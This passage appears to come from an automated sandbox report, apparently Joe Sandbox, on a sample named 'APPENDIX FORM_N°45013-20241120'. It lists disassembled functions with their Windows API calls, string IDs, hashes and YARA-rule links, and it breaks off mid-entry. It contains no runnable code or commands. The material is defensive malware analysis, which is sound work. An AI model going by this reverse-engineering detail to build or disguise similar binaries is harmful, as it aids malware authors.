                                                                                                              • Opcode Fuzzy Hash: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                                                                                              • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                                              Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                                • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                                • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                              • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                              • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                              • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                              • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                              • String ID:
                                                                                                              • API String ID: 764393265-0
                                                                                                              • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                              • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                              • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                              • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                              Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Time$System$File$LocalSpecific
                                                                                                              • String ID:
                                                                                                              • API String ID: 979780441-0
                                                                                                              • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                              • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                                              • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                              • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                                              Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                                              • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                              • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpy$DialogHandleModuleParam
                                                                                                              • String ID:
                                                                                                              • API String ID: 1386444988-0
                                                                                                              • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                              • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                              • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                              • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                              Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(00940048), ref: 0044DF01
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(00A572C0), ref: 0044DF11
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(00A57AD0), ref: 0044DF21
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(00A576C8), ref: 0044DF31
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ??3@
                                                                                                              • String ID:
                                                                                                              • API String ID: 613200358-0
                                                                                                              • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                              • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                              • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                              • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                              Function 00411D08 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                                              • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InvalidateMessageRectSend
                                                                                                              • String ID: d=E
                                                                                                              • API String ID: 909852535-3703654223
                                                                                                              • Opcode ID: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                                                                                              • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                                                              • Opcode Fuzzy Hash: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                                                                                              • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                                                              Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • wcschr.MSVCRT ref: 0040F79E
                                                                                                              • wcschr.MSVCRT ref: 0040F7AC
                                                                                                                • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                                • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4), ref: 0040AACB
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: wcschr$memcpywcslen
                                                                                                              • String ID: "
                                                                                                              • API String ID: 1983396471-123907689
                                                                                                              • Opcode ID: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                                                                              • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                              • Opcode Fuzzy Hash: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                                                                              • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                              Function 0040BFF3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                              • _memicmp.MSVCRT ref: 0040C00D
                                                                                                              • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FilePointer_memicmpmemcpy
                                                                                                              • String ID: URL
                                                                                                              • API String ID: 2108176848-3574463123
                                                                                                              • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                              • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                                                              • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                              • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                                                              Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _snwprintf.MSVCRT ref: 0040A398
                                                                                                              • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _snwprintfmemcpy
                                                                                                              • String ID: %2.2X
                                                                                                              • API String ID: 2789212964-323797159
                                                                                                              • Opcode ID: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                                                                              • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                              • Opcode Fuzzy Hash: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                                                                              • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                              Function 0040F9B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _snwprintf
                                                                                                              • String ID: %%-%d.%ds
                                                                                                              • API String ID: 3988819677-2008345750
                                                                                                              • Opcode ID: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                                                                              • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                                              • Opcode Fuzzy Hash: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                                                                              • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                                              Function 004018DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetWindowPlacement.USER32(?,?,?,?,?,00411B7F,?,General,?,00000000,00000001), ref: 00401904
                                                                                                              • memset.MSVCRT ref: 00401917
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: PlacementWindowmemset
                                                                                                              • String ID: WinPos
                                                                                                              • API String ID: 4036792311-2823255486
                                                                                                              • Opcode ID: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                                                                              • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                              • Opcode Fuzzy Hash: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                                                                              • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                              Function 0040DCE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                              • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                                              • wcscat.MSVCRT ref: 0040DCFF
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileModuleNamewcscatwcsrchr
                                                                                                              • String ID: _lng.ini
                                                                                                              • API String ID: 383090722-1948609170
                                                                                                              • Opcode ID: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                                                                              • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                                              • Opcode Fuzzy Hash: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                                                                              • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                                              Function 00414B81 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                              • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                                              • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                              • API String ID: 2773794195-880857682
                                                                                                              • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                                              • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                                              • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                                              • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                                              Function 0040A153 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0040A159
                                                                                                              • SetWindowLongW.USER32(000000EC,000000EC,00000000), ref: 0040A16B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: LongWindow
                                                                                                              • String ID: MZ@
                                                                                                              • API String ID: 1378638983-2978689999
                                                                                                              • Opcode ID: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                                                              • Instruction ID: 658df1d6f65a5f4ca5cf2dc917bfbc57e2b12ac14a328fb0c2cac09aa770bd9f
                                                                                                              • Opcode Fuzzy Hash: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                                                              • Instruction Fuzzy Hash: 3FC0027415D116AFDF112B35EC0AE2A7EA9BB86362F208BB4B076E01F1CB7184109A09
                                                                                                              Function 0042B9BD Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                                              • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                                              • memset.MSVCRT ref: 0042BAAE
                                                                                                              • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpy$memset
                                                                                                              • String ID:
                                                                                                              • API String ID: 438689982-0
                                                                                                              • Opcode ID: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                                                                              • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                                              • Opcode Fuzzy Hash: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                                                                              • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                                              Function 0040E820 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ??2@$memset
                                                                                                              • String ID:
                                                                                                              • API String ID: 1860491036-0
                                                                                                              • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                              • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                                              • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                              • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                                              Function 0040A8D0 Relevance: 5.1, APIs: 4, Instructions: 69COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • wcslen.MSVCRT ref: 0040A8E2
                                                                                                                • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                                • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                              • free.MSVCRT ref: 0040A908
                                                                                                              • free.MSVCRT ref: 0040A92B
                                                                                                              • memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: free$memcpy$mallocwcslen
                                                                                                              • String ID:
                                                                                                              • API String ID: 726966127-0
                                                                                                              • Opcode ID: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                                                                                              • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                                              • Opcode Fuzzy Hash: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                                                                                              • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                                              Function 0040B1D1 Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • wcslen.MSVCRT ref: 0040B1DE
                                                                                                              • free.MSVCRT ref: 0040B201
                                                                                                                • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
